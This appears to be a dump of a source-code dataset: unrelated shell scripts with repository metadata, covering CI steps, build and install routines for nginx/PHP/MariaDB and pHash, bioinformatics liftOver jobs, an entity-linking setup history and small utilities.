    # url of format http://..../job/<name>/number
    local burl="${url%%/job/*}/job"
    # t gets <project>/number[/*]
    local t="${url#${burl}/}"
    local name="" number=""
    set -- ${t//\// }
    name=${1}
    number=${2}
    debug 1 "project-name=$name build-number=$number"

    url="${burl}/$name/$number"
    local ctmp="${TEMP_D}/$name-console.log"
    local atmp="${TEMP_D}/$name-artifacts.zip"
    local atxz="${TEMP_D}/$name-artifacts.tar.xz"
    local aurl="$url/artifact/*zip*/archive.zip"

    # Fetch the console text and the server-side zip of all artifacts.
    wget "$url/consoleText" -O "$ctmp" ||
        fail "failed to download $url/consoleText"
    wget "$aurl" -O "$atmp" ||
        fail "failed download $aurl"

    # Unpack the zip and repack it as tar.xz.
    mkdir "${TEMP_D}/ex" &&
        ( cd "${TEMP_D}/ex" && unzip "${atmp}" ) ||
        fail "failed to extract zip file from $aurl"
    tar -C "${TEMP_D}/ex" -cJf "$atxz" . ||
        fail "failed to create $atxz"

    mv "$ctmp" "$atxz" . || fail "failed moving files to ."
    error "wrote to ${ctmp##*/} ${atxz##*/}"
}

main "$@"
# vi: ts=4 expandtab syntax=sh
| true
|
209c200193a7c1aae66e867eb1529a49d1ceb35a
|
Shell
|
rapidsai/xgboost
|
/tests/buildkite/test-python-cpu.sh
|
UTF-8
| 491
| 2.5625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -euo pipefail
echo "--- Test CPU code in Python env"
source tests/buildkite/conftest.sh
mkdir -pv python-package/dist
# Reuse artifacts from earlier pipeline steps: the wheel from the CUDA
# build step and the CLI binary from the CPU build step.
buildkite-agent artifact download "python-package/dist/*.whl" . --step build-cuda
buildkite-agent artifact download "xgboost" . --step build-cpu
chmod +x ./xgboost
# NOTE(review): 'export VAR=$(cmd)' masks the command's exit status, so a
# failing secret lookup would not trip 'set -e' here — confirm intended.
export BUILDKITE_ANALYTICS_TOKEN=$(get_aws_secret buildkite/test_analytics/cpu)
set_buildkite_env_vars_in_container
tests/ci_build/ci_build.sh cpu docker tests/ci_build/test_python.sh cpu
| true
|
a052c6555e67eea2ce2de3589c3f9bbf3a0e7890
|
Shell
|
macrovo/REL
|
/.bash_history
|
UTF-8
| 6,856
| 2.6875
| 3
|
[
"MIT"
] |
permissive
|
# INITIAL setup
apt-get install libomp-dev
apt-get install libopenblas-dev
apt-get install libomp-dev
pip3 install git+https://github.com/informagi/REL
pip3 install faiss
pip3 install flair
pip3 uninstall torch
pip3 install torch==1.6
pip3 install wikipedia2vec
pip3 install gensim=>3.8.0 -U
mkdir ~/rel && cd ~/rel
mkdir -p wiki_latest/basic_data/anchor_files
mkdir -p wiki_latest/generated/old
mkdir -p wiki_latest/generated/test_train_data
wget -c http://gem.cs.ru.nl/generic.tar.gz
wget -c http://gem.cs.ru.nl/wiki_2019.tar.gz
wget -c http://gem.cs.ru.nl/ed-wiki-2019.tar.gz
gunzip generic.tar.gz
gunzip ed-wiki-2019.tar.gz
gunzip wiki_2019.tar.gz
tar -xvf generic.tar
tar -xvf ed-wiki-2019.tar
tar -xvf wiki_2019.tar
#git clone https://github.com/informagi/REL.git
#pip uninstall REL
pip install git+https://github.com/informagi/REL
# This should work, test
nohup python3 rel.py &
python3 rel_test.py
# kill above rel.py process when updating below.
# UPDATING Wikipedia version: https://github.com/informagi/REL/tree/master/tutorials/deploy_REL_new_Wiki
#best to name folder wiki_latest, and then don't need to grep / sed all the py / bash files.. simply replace latest wiki dump
cd ~/rel
wget -c https://dumps.wikimedia.org/enwiki/20210901/enwiki-20210901-pages-articles-multistream.xml.bz2
#We will need both comressed and uncompressed versions
cp enwiki-20210901-pages-articles-multistream.xml.bz2 enwiki-latest-pages-articles-multistream.xml.bz2
cp enwiki-latest-pages-articles-multistream.xml.bz2 wiki_corpus.xml.bz2
bzip2 -dk enwiki-latest-pages-articles-multistream.xml.bz2
#https://github.com/informagi/REL/blob/master/tutorials/deploy_REL_new_Wiki/04_01_Extracting_a_new_Wikipedia_corpus.md
cd REL/
find -name WikiExtractor.py
cp REL/scripts/WikiExtractor.py wiki_latest/basic_data/
mv enwiki-latest-pages-articles-multistream.xml wiki_latest/basic_data/
cd wiki_latest/basic_data/
mv enwiki-latest-pages-articles-multistream.xml wiki_corpus.xml
nohup python3 WikiExtractor.py ./wiki_corpus.xml --links --filter_disambig_pages --processes 1 --bytes 1G &
mv wiki_corpus.xml anchor_files/
#can move this segment to initial setup above, as renamed from 2021 to latest
cd code_tutorials/
grep base_url *.py
sed -i 's/base_url = ""/base_url = "\/root\/rel\/"/g' *.py
sed -i 's/wiki_2019/wiki_latest/g' *.py
cd ~/rel/REL/scripts/code_tutorials/
grep -rn "base_url = " --include="*.py" /root/rel/
find /root/rel/ -type f | xargs sed -i 's/base_url = "\/Users\/vanhulsm\/Desktop\/projects\/data\/"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "\/Users\/vanhulsm\/Desktop\/projects\/data\/"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "\/users\/vanhulsm\/Desktop\/projects\/data\/"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "\/users\/vanhulsm\/Desktop\/projects\/data"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "C:\/Users\/mickv\/Desktop\/data_back\/"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "C:\/Users\/mickv\/desktop\/data_back\/"/base_url = "\/root\/rel\/"/g'
cd /usr/local/lib/python3.6/dist-packages/REL/
grep -rn "base_url = " --include="*.py" .
#move above this segment
cd /root/rel/REL/scripts/code_tutorials/
cd ~/rel/wiki_latest/basic_data/
mv wiki_corpus.xml ..
mv ../text/AA/wiki_* .
cd ~/rel/REL/scripts/code_tutorials/
python3 generate_p_e_m.py
# now run py code from above link-graph, may be in generate_p_e_m.py.. have to check.
#https://github.com/informagi/REL/blob/master/tutorials/deploy_REL_new_Wiki/04_02_training_your_own_embeddings.md
cd REL/scripts/w2v/
cat preprocess.sh | tr -d '\r' > preprocess2.sh
chmod +x preprocess2.sh
cd ~/rel/wiki_latest/basic_data/
mv wiki_corpus.xml.bz2 enwiki-pages-articles.xml.bz2
chmod +w enwiki-pages-articles.xml.bz2 && chmod +x enwiki-pages-articles.xml.bz2
cd ~/rel/REL/scripts/w2v
#commented out 1st command with joe
joe preprocess2.sh
#that command line from preprocess2.sh manually
wikipedia2vec build-dump-db /root/rel/wiki_latest/basic_data/ wiki_corpus.xml.bz2
#rest
nohup ./preprocess2.sh &
#from train.sh, modified
nohup /root/.local/bin/wikipedia2vec train --min-entity-count 0 --disambi ~/rel/wiki_latest/basic_data/enwiki-pages-articles.xml.bz2 wikipedia2vec_trained &
nohup /root/.local/bin/wikipedia2vec train-embedding dump_file dump_dict wikipedia2vec_trained --link-graph dump_graph --mention-db dump_mention --dim-size 300 &
nohup /root/.local/bin/wikipedia2vec save-text --out-format word2vec wikipedia2vec_trained wikipedia2vec_wv2vformat &
#now run py code from above link, replace enwiki_w2v_model with wikipedia2vec_wv2vformat
#https://github.com/informagi/REL/blob/master/tutorials/deploy_REL_new_Wiki/04_03_generating_training_test_files.md
cd ~/rel
grep -r -i --include \*.py 'emb.load_word2emb' .
#i think i didn't edit anything here!
joe ./REL/REL/db/generic.py
#move this to initial setup above
cd ~/rel/generic/test_datasets/wned-datasets/wikipedia/RawText
mv Harvard_Crimson_men_s_lacrosse "Harvard_Crimson_men's_lacrosse"
mv "Zielona_Gвra_(parliamentary_constituency)" "Zielona_Góra_(parliamentary_constituency)"
mv "Mary_O_Connor_(sportsperson)" "Mary_O'Connor_(sportsperson)"
mv "Florida_Gulf_Coast_Eagles_men_s_basketball" "Florida_Gulf_Coast_Eagles_men's_basketball"
mv "Chippenham_United_F.C_" "Chippenham_United_F.C."
mv Czech_Republic_men_s_national_ice_hockey_team "Czech_Republic_men's_national_ice_hockey_team"
mv Love_s_Welcome_at_Bolsover "Love's_Welcome_at_Bolsover"
mv Ya_akov_Riftin "Ya'akov_Riftin"
mv CA_Saint-Рtienne_Loire_Sud_Rugby "CA_Saint-Étienne_Loire_Sud_Rugby"
mv Jeanne_d_Рvreux "Jeanne_d'Évreux"
mv "Rбo_Verde,_Chile" "Río_Verde,_Chile"
mv "Law___Order_(season_16)" "Law_&_Order_(season_16)"
mv "Love___Life_(Mary_J._Blige_album)" "Love_&_Life_(Mary_J._Blige_album)"
mv WБrttemberger "Württemberger"
mv ChГteau_d_Oiron "Château_d'Oiron"
mv "Krasi,_Thalassa_Kai_T__Agori_Mou" "Krasi,_Thalassa_Kai_T'_Agori_Mou"
mv "Alfred_Conkling_Coxe,_Sr_" "Alfred_Conkling_Coxe,_Sr."
mv "Clara_NordstrФm" "Clara_Nordström"
mv "Hittin__the_Trail_for_Hallelujah_Land" "Hittin'_the_Trail_for_Hallelujah_Land"
mv JosВ_Evangelista "José_Evangelista"
mv Putin_s_rynda "Putin's_rynda"
#commenced out #"wned-clueweb",
joe /usr/local/lib/python3.6/dist-packages/REL/training_datasets.py
rm -rf /usr/local/lib/python3.6/dist-packages/REL/__pycache__
#move above this segment
#now run py code from above link
#https://github.com/informagi/REL/blob/master/tutorials/deploy_REL_new_Wiki/04_04_training_your_own_ED_model.md
#run py codes from above link
#this should work now with latest dump
nohup python3 rel.py &
python3 rel_test.py
| true
|
47e65cfff5eff9f4850ff66b44e791df013ff42f
|
Shell
|
MicroFire33/ssdv2
|
/prerequis.sh
|
UTF-8
| 1,485
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
###############################################################
if [ "$USER" != "root" ]; then
echo "Ce script doit être lancé en sudo ou par root !"
exit 1
fi
# Absolute path to this script.
CURRENT_SCRIPT=$(readlink -f "$0")
# Absolute path this script is in.
export SCRIPTPATH=$(dirname "$CURRENT_SCRIPT")
cd ${SCRIPTPATH}
readonly PIP="9.0.3"
readonly ANSIBLE="2.9"
${SCRIPTPATH}/includes/config/scripts/prerequis_root.sh ${SCRIPTPATH}
## Install pip3 Dependencies
python3 -m pip install --user --disable-pip-version-check --upgrade --force-reinstall \
pip==${PIP}
python3 -m pip install --user --disable-pip-version-check --upgrade --force-reinstall \
setuptools
python3 -m pip install --user --disable-pip-version-check --upgrade --force-reinstall \
pyOpenSSL \
requests \
netaddr \
jmespath \
ansible==${1-$ANSIBLE} \
docker
## Copy pip to /usr/bin
rm -f /usr/bin/pip3
ln -s ${HOME}/.local/bin/pip3 /usr/bin/pip3
ln -s ${HOME}/.local/bin/pip3 /usr/bin/pip
${HOME}/.local/bin/ansible-playbook includes/config/playbooks/sudoers.yml
${HOME}/.local/bin/ansible-playbook includes/config/roles/users/tasks/main.yml
echo "---------------------------------------"
echo "Si c'est la première fois que vous lancez ce script, il est TRES FORTEMENT conseillé de redémmarer le serveur avant de continuer"
echo "Vous pourrez ensuite lancer "
echo "cd /opt/seedbox-compose"
echo "./seedbox.sh "
echo "pour installer la seedbox"
touch ${SCRIPTPATH}/.prerequis.lock
| true
|
115ba543c8704af8812fe37ced436c6cf7f29632
|
Shell
|
wangpanqiao/VDR_CHIPEXO
|
/do_liftover_bed_bdg_cluster.sh
|
UTF-8
| 3,396
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
#script to do liftover from hg18 to hg19 for multiple bed files
#eg /net/isi-backup/giuseppe/scripts/liftOver GM_consensus_slop_1000.bed /net/isi-scratch/giuseppe/GATK_RESOURCES/chain/hg19tob37.chain GM_consensus_slop_1000_liftover19_37.bed unlifted_1000.bed
#liftOver - Move annotations from one assembly to another
#usage:
# liftOver oldFile map.chain newFile unMapped
#oldFile and newFile are in bed format by default, but can be in GFF and
#maybe eventually others with the appropriate flags below.
#The map.chain file has the old genome as the target and the new genome
#as the query.
#
#***********************************************************************
#WARNING: liftOver was only designed to work between different
# assemblies of the same organism, it may not do what you want
# if you are lifting between different organisms.
#***********************************************************************
#
#options:
# -minMatch=0.N Minimum ratio of bases that must remap. Default 0.95
# -gff File is in gff/gtf format. Note that the gff lines are converted
# separately. It would be good to have a separate check after this
# that the lines that make up a gene model still make a plausible gene
# after liftOver
# -genePred - File is in genePred format
# -sample - File is in sample format
# -bedPlus=N - File is bed N+ format
# -positions - File is in browser "position" format
# -hasBin - File has bin value (used only with -bedPlus)
# -tab - Separate by tabs rather than space (used only with -bedPlus)
# -pslT - File is in psl format, map target side only
# -minBlocks=0.N Minimum ratio of alignment blocks or exons that must map
# (default 1.00)
# -fudgeThick (bed 12 or 12+ only) If thickStart/thickEnd is not mapped,
# use the closest mapped base. Recommended if using
# -minBlocks.
# -multiple Allow multiple output regions
# -minChainT, -minChainQ Minimum chain size in target/query, when mapping
# to multiple output regions (default 0, 0)
# -minSizeT deprecated synonym for -minChainT (ENCODE compat.)
# -minSizeQ Min matching region size in query with -multiple.
# -chainTable Used with -multiple, format is db.tablename,
# to extend chains from net (preserves dups)
# -errorHelp Explain error messages
if [ ! $# == 4 ]; then
echo "Usage: `basename $0` <PATH> <EXT> <CHAIN> <STRING>"
echo "<PATH> Directory containing the data files (e.g. /home/me/files)"
echo "<EXT> file extension (e.g. bed, bedgraph, bdg)"
echo "<CHAIN> full path to chain file to use"
echo "<STRING> mnemonic string to use for lifted over files (eg hg19)"
exit
fi
PDATA=$1;
EXT=$2;
PCHAIN=$3;
PSTRING=$4;
PCODE="/net/isi-backup/giuseppe/scripts";
for FILE in ${PDATA}/*.${EXT};
do
ID=`basename ${FILE} ".${EXT}"`;
SCRIPT=liftover_${ID}.sh;
echo '#!/bin/bash' >>${PDATA}/${SCRIPT};
echo '' >>${PDATA}/${SCRIPT};
echo "${PCODE}/liftOver ${FILE} ${PCHAIN} ${PDATA}/${ID}_${PSTRING}.${EXT} ${PDATA}/${ID}_unmapped.${EXT}" >>${PDATA}/${SCRIPT};
nice -5 qsub -e ${PDATA}/liftover_${ID}.err -o ${PDATA}/liftover_${ID}.out -q newnodes.q ${PDATA}/${SCRIPT};
rm ${PDATA}/${SCRIPT};
done
| true
|
32a3ad3b7a79ceee3d29111526dd8bdd99035d7a
|
Shell
|
ianthehenry/httprintf
|
/scripts/http-handler
|
UTF-8
| 1,407
| 3.921875
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env sh
log() {
echo "$1" >&2
}
tee1() {
awk 'NR==1 {print $0 > "/dev/stderr"} {print $0}'
}
tryinvoke() {
if [ -x "$1" ]; then
log " $1 $2 $3"
"$1" "$2" "$3" | tee1
return 0
else if [ -f "$1" ]; then
log " $1 exists but is not executable"
fi fi
return 1
}
paths() {
local method="$1"
local path="$2"
case "$path" in
*/) local directory=1; path=${path%*/}; local file="";;
*) local directory=0;;
esac
if [ "$directory" -eq 1 ]; then
tryinvoke "$path/$method" "." "$method"
if [ $? -eq 0 ]; then
return 0
fi
fi
while true; do
if [ -z ${file+x} ]; then
local file="$(basename "$path")"
else
local file="$(basename "$path")/$file"
fi
local path="$(dirname "$path")"
tryinvoke "$path/$method" "./$file" "$method"
if [ $? -eq 0 ]; then
return 0
fi
if [ "$path" = "." ]; then
break
fi
done
return 1
}
request="$(head -n1)"
method="$(printf %s "$request" | awk '{ print $1 }')"
path="$(printf %s "$request" | awk '{ print $2 }')"
printf "%s %s\n" "$(date "+%H:%M:%S")" "$request" >&2
paths "$method" ".$path"
if [ $? -eq 0 ]; then
exit 0
fi
paths "ANY" ".$path"
if [ $? -eq 0 ]; then
exit 0
fi
log " no match"
printf " " >&2
http-status 405 | tee1
http-header "Allow" ""
http-header "Content-Length" "20"
http-begin-body
echo "No matching handler."
| true
|
35afb9207e25331c9f2f166e170c7122351f9757
|
Shell
|
perfectfoolish/abs
|
/array-function.sh
|
UTF-8
| 2,116
| 4.625
| 5
|
[] |
no_license
|
#!/bin/bash
# array-function.sh: Passing an array to a function and ...
# "returning" an array from a function
Pass_Array ()
{
local passed_array # Local variable!
passed_array=( `echo "$1"` )
echo "${passed_array[@]}"
# List all the elements of the new array
#+ declared and set within the function.
}
original_array=( element1 element2 element3 element4 element5 )
echo
echo "original_array = ${original_array[@]}"
# List all elements of original array.
# This is the trick that permits passing an array to a function.
# **********************************
argument=`echo ${original_array[@]}`
# **********************************
# Pack a variable
#+ with all the space-separated elements of the original array.
#
# Attempting to just pass the array itself will not work.
# This is the trick that allows grabbing an array as a "return value".
# *****************************************
returned_array=( `Pass_Array "$argument"` )
# *****************************************
# Assign 'echoed' output of function to array variable.
echo "returned_array = ${returned_array[@]}"
echo "============================================================="
# Now, try it again,
#+ attempting to access (list) the array from outside the function.
Pass_Array "$argument"
# The function itself lists the array, but ...
#+ accessing the array from outside the function is forbidden.
echo "Passed array (within function) = ${passed_array[@]}"
# NULL VALUE since the array is a variable local to the function.
echo
############################################
# And here is an even more explicit example:
ret_array ()
{
for element in {11..20}
do
echo "$element " # Echo individual elements
done #+ of what will be assembled into an array.
}
arr=( $(ret_array) ) # Assemble into array.
echo "Capturing array \"arr\" from function ret_array () ..."
echo "Third element of array \"arr\" is ${arr[2]}." # 13 (zero-indexed)
echo -n "Entire array is: "
echo ${arr[@]} # 11 12 13 14 15 16 17 18 19 20
echo
exit 0
| true
|
2e775ecdcf46c0803fe757c35cde598d9b1c80d4
|
Shell
|
huyn03/fastinstall
|
/install.sh
|
UTF-8
| 7,085
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/sh
_TMPDIR="/usr/tmp"
_PATH="https://raw.githubusercontent.com/huyn03/fastinstall/master"
function installNotExists(){
$(rpm -q "$packages" | grep -e "not installed" | awk 'BEGIN { FS = " " } ; { printf $2" "}' > list.txt)
install=$(cat list.txt)
grep -q '[^[:space:]]' < list.txt
EMPTY_FILE=$?
if [[ $EMPTY_FILE -eq 1 ]]; then
echo "Nothing to do"
else
yum install -y $install
fi
}
packages="epel-release"
installNotExists $packages
packages="wget"
installNotExists $packages
packages="unzip"
installNotExists $packages
function nginx_php(){
tmpdir=$_TMPDIR/nginx-php
dpath=$_PATH/nginx-php
rootdir="/home/www"
packages="nginx"
installNotExists $packages
default="7"
read -p "Cai tren centos ($default or 8) : " _version
: ${_version:=$default}
function centos(){
wget -nc $dpath/index.php -P $tmpdir
}
function centos7(){
dpath=$_PATH/nginx-php/centos7
yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm -y
yum-config-manager --enable remi-php73 -y
yum --enablerepo=remi,remi-php73 install php-fpm php-common -y
yum --enablerepo=remi,remi-php73 install php-cli php-pdo php-mysqlnd php-gd php-mbstring php-mcrypt php-xml php-zip -y
wget -nc $dpath/php.ini -P $tmpdir
wget -nc $dpath/www.conf -P $tmpdir
wget -nc $dpath/your-domain.conf -P $tmpdir
wget -nc $dpath/nginx.conf -P $tmpdir
cp -r $tmpdir/php.ini /etc/php.ini
cp -r $tmpdir/www.conf /etc/php-fpm.d/www.conf
cp -r $tmpdir/your-domain.conf /etc/nginx/conf.d/your-domain.conf
cp -r $tmpdir/nginx.conf /etc/nginx/nginx.conf
}
function centos8(){
dpath=$_PATH/nginx-php/centos8
dnf install dnf-utils http://rpms.remirepo.net/enterprise/remi-release-8.rpm -y
dnf module reset php -y
dnf module enable php:remi-7.4 -y
dnf install php-fpm php-common -y
dnf install php-cli php-pdo php-mysqlnd php-gd php-mbstring php-mcrypt php-xml php-zip -y
wget -nc $dpath/www.conf -P $tmpdir
wget -nc $dpath/your-domain.conf -P $tmpdir
wget -nc $dpath/nginx.conf -P $tmpdir
cp -r $tmpdir/www.conf /etc/php-fpm.d/www.conf
cp -r $tmpdir/your-domain.conf /etc/nginx/conf.d/your-domain.conf
cp -r $tmpdir/nginx.conf /etc/nginx/nginx.conf
}
centos
centos$_version
# packages="php-fpm php-common php-cli php-pdo php-mysqlnd php-gd php-mbstring php-mcrypt php-xml php-zip"
# installNotExists $packages
systemctl start nginx
systemctl enable nginx
systemctl start php-fpm
systemctl enable php-fpm
mkdir -p $rootdir/your-domain
cp -r $tmpdir/index.php $rootdir/your-domain
chown nginx:nginx -R $rootdir/your-domain
chown -R nginx:nginx /var/lib/php/session/
chcon -Rt httpd_sys_content_t $rootdir/your-domain
chcon -Rt httpd_sys_rw_content_t $rootdir/your-domain
setsebool httpd_can_network_connect 1
}
#install mariadb
function mariadb(){
tmpdir=$_TMPDIR/mariadb
dpath=$_PATH/mariadb
packages="mariadb-server"
installNotExists $packages
wget -nc $dpath/my.cnf -P $tmpdir
cp -r $tmpdir/my.cnf /etc/my.cnf
systemctl start mariadb
systemctl enable mariadb
mysql_secure_installation
}
function vltkm(){
tmpdir=$_TMPDIR/vltkm
dpath=$_PATH/vltkm
rootdir="/home/vltkm"
pPackages=""
default=`wget -qO - icanhazip.com`
read -p "Ip may chu ($default): " vpsip
: ${vpsip:=$default}
default=123456
read -p "Mat khau database ($default): " dbpassword
: ${dbpassword:=$default}
default=127.0.0.1
read -p "Gateway Ip ($default): " gatewayip
: ${gatewayip:=$default}
default=11002
read -p "Gateway Port ($default): " gatewayport
: ${gatewayport:=$default}
function lib(){
wget -nc $dpath/libstdc++.so.6.zip -P $tmpdir
unzip -o $tmpdir/libstdc++.so.6.zip -d $rootdir
cp $rootdir/libstdc++.so.6.20 /lib64
rm -f /lib64/libstdc++.so.6
ln -s /lib64/libstdc++.so.6.20 /lib64/libstdc++.so.6
ldconfig
}
function gateway(){
wget -nc $dpath/Gateway.zip -P $tmpdir
unzip -o $tmpdir/Gateway.zip -d $rootdir/Gateway
sed -i "s/VPSIP/$vpsip/g" $rootdir/Gateway/gateway.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $rootdir/Gateway/gateway.ini
sed -i "s/GATEPORT/$gatewayport/g" $rootdir/Gateway/gateway.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $rootdir/Gateway/GoJxHttpSetting/go-jxhttp.json
sed -i "s/DBPASSWORD/$dbpassword/g" $rootdir/Gateway/GoJxHttpSetting/go-jxhttp_idip.json
sed -i "s/DBPASSWORD/$dbpassword/g" $rootdir/Gateway/RankServer.json
}
function webapi(){
default="/home/www/your-domain"
read -p "Thu muc chay web ($default) : " webdir
: ${webdir:=$default}
wget -nc https://octobercms.com/download -O octobercms.zip
wget -nc $dpath/web.zip -P $webdir
unzip -o octobercms.zip -d $webdir
rm -f octobercms.zip
mv $webdir/install-master/* $webdir
chown nginx:nginx -R $webdir
}
function serverPackages(){
default=$dpath/Package.zip
if [ "$pPackages" == "" ]
then
read -p "Duong dan download Package.zip(package.idx, package0.dat): " pPackages
: ${pPackages:=$default}
fi
wget -nc $dpath/ServerLibs.zip -P $tmpdir
wget -nc $dpath/Server.zip -P $tmpdir
wget -nc $pPackages -P $tmpdir
}
function zone(){
numsv=00
serverPackages
wget -nc $dpath/StartZone.zip -P $tmpdir
sdir="$rootdir/Zone"
unzip -o $tmpdir/ServerLibs.zip -d $sdir
unzip -o $tmpdir/Server.zip -d $sdir
unzip -o $tmpdir/Package.zip -d $sdir
unzip -o $tmpdir/StartZone.zip -d $sdir
sed -i "s/NUMSV/$numsv/g" $sdir/world_server.ini
sed -i "s/VPSIP/$vpsip/g" $sdir/world_server.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $sdir/world_server.ini
sed -i "s/GATEIP/$gatewayip/g" $sdir/world_server.ini
sed -i "s/GATEPORT/$gatewayport/g" $sdir/world_server.ini
sed -i "s/NUMSV/$numsv/g" $sdir/FileServer.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $sdir/FileServer.ini
mv $sdir/FileServer $sdir/ZoneFileServer
mv $sdir/Server $sdir/ZoneServer
}
function server(){
serverPackages
wget -nc $dpath/StartSV.zip -P $tmpdir
default=01
read -p "Nhap ten server (vd: $default): " numsv
: ${numsv:=$default}
sdir="$rootdir/Server_$numsv"
unzip -o $tmpdir/ServerLibs.zip -d $sdir
unzip -o $tmpdir/Server.zip -d $sdir
unzip -o $tmpdir/Package.zip -d $sdir
unzip -o $tmpdir/StartSV.zip -d $sdir
sed -i "s/NUMSV/$numsv/g" $sdir/world_server.ini
sed -i "s/VPSIP/$vpsip/g" $sdir/world_server.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $sdir/world_server.ini
sed -i "s/GATEIP/$gatewayip/g" $sdir/world_server.ini
sed -i "s/GATEPORT/$gatewayport/g" $sdir/world_server.ini
sed -i "s/NUMSV/$numsv/g" $sdir/FileServer.ini
sed -i "s/DBPASSWORD/$dbpassword/g" $sdir/FileServer.ini
sed -i "s/NUMSV/$numsv/g" $sdir/start.sh
sed -i "s/NUMSV/$numsv/g" $sdir/world_server.sh
sed -i "s/NUMSV/$numsv/g" $sdir/stop.sh
mv $sdir/FileServer $sdir/FileServer_$numsv
mv $sdir/Server $sdir/Server_$numsv
}
default="lib gateway zone server webapi"
read -p 'Enter packages (lib, gateway, zone, server, webapi): ' packages
: ${packages:=$default}
for package in $packages; do $package; done
chmod -R 755 $rootdir
}
default="nginx_php mariadb vltkm"
packages=$@
: ${packages:=$default}
for package in $packages; do $package; done
| true
|
d00a77801116c7d12f0b8584592573efc3862889
|
Shell
|
bpmurray/Exactitude
|
/Exactitude-tools/phase-3-compile.sh
|
UTF-8
| 3,598
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/sh
##############################################################################
# This is the third phase - compile the files
. ../Exactitude-tools/phase-0-settings.sh
##############################################################################
# Start the process
echo "Phase 3: Configure and compile"
###############################################################################
# Build the files
# JPEG
echo -n "Building JPEG ..."
echo "===================== JPEG-${JPEGSRC_VERSION} ======================" >${BUILDLOG}
cd ${SRCDIR}/jpeg-${JPEGSRC_VERSION}
echo -n " configure ..."
./configure CFLAGS='-O2' ${CONFIGFLAGS} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
make test >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# ffmpeg
echo -n "Building FFMPEG ..."
echo "===================== ffmpeg-${FFMPEG_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/ffmpeg-${FFMPEG_VERSION}
echo -n " configure ..."
./configure --prefix=${PREFIX} --enable-shared --enable-swscale --enable-pthreads ${CONFIGFLAGSA} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# libsndfile
echo -n "Building libsndfile ..."
echo "===================== libsndfile-${LIBSNDFILE_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/libsndfile-${LIBSNDFILE_VERSION}
## We may need these (note: they require a load of extra stuff!)
# sudo apt-get install libflac* libogg* libvorbis*
echo -n " configure ..."
./configure ${CONFIGFLAGS} --prefix=${PREFIX} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# libsamplerate
echo -n "Building libsamplerate ..."
echo "===================== libsamplerate-${LIBSAMPLERATE_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/libsamplerate-${LIBSAMPLERATE_VERSION}
echo -n " configure ..."
./configure ${CONFIGFLAGS} --prefix=${PREFIX} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# mpg123
echo -n "Building mpg123 ..."
echo "===================== mpg123-${MPG123_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/mpg123-${MPG123_VERSION}
echo -n " configure ..."
./configure ${CONFIGFLAGS} --prefix=${PREFIX} --exec-prefix=${PREFIX} >>${BUILDLOG} 2>&1
echo -n " build ..."
make >>${BUILDLOG} 2>&1
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
# pHash
echo -n "Building pHash ..."
echo "===================== phash-${PHASH_VERSION} ======================" >>${BUILDLOG}
cd ${SRCDIR}/pHash-${PHASH_VERSION}
${COPY} ../CImg-${CIMG_VERSION}/CImg.h ${INCDIR}
${COPY} ../CImg-${CIMG_VERSION}/CImg.h .
echo -n " configure ..."
echo ./configure --enable-java --enable-video-hash ${CONFIGFLAGS} LDFLAGS=${LDFLAGS} CFLAGS=${CFLAGS} >>${BUILDLOG} 2>&1
./configure --enable-java --enable-video-hash ${CONFIGFLAGS} LDFLAGS=${LDFLAGS} CFLAGS="${CFLAGS}" >>${BUILDLOG} 2>&1
echo -n " build ..."
make clean
make >>${BUILDLOG} 2>&1
cd bindings/java
# Copy the updated file(s)
${COPYALL} ${STARTDIR}/../Exactitude-pHash/pHash-updates/* .
rm -rf ./org/.svn ./org/phash/.svn
mkdir -p bin
javac -d bin org/phash/*.java >>${BUILDLOG} 2>&1
cd bin
jar -cf ${LIBDIR}/pHash-${PHASH_VERSION}.jar *
cd ${SRCDIR}/pHash-${PHASH_VERSION}
echo -n " install ..."
make install >>${BUILDLOG} 2>&1
echo "done!"
###############################################################################
echo "Phase 3 (compile) complete"
| true
|
e6399ef29449d1a438026973fb953be725341d59
|
Shell
|
boakes/BST
|
/git.sh
|
UTF-8
| 265
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/sh
cd "$(dirname "$0")"
now=$(date +"%D %T")
cp ~/Desktop/DataAbstraction/BST\ Map/BSTMap.cpp ~/Desktop/DataAbRepo/BST/
cp ~/Desktop/DataAbstraction/BST\ Map/BSTMap.h ~/Desktop/DataAbRepo/BST/
echo "Finished copy!"
git add .
git commit -m "$now"
git push
| true
|
96c33c32ce80b99eb6bd7819ed57d59df1099bff
|
Shell
|
baio/ride-better-ionic-app
|
/res/gen-screen.sh
|
UTF-8
| 1,834
| 3.21875
| 3
|
[] |
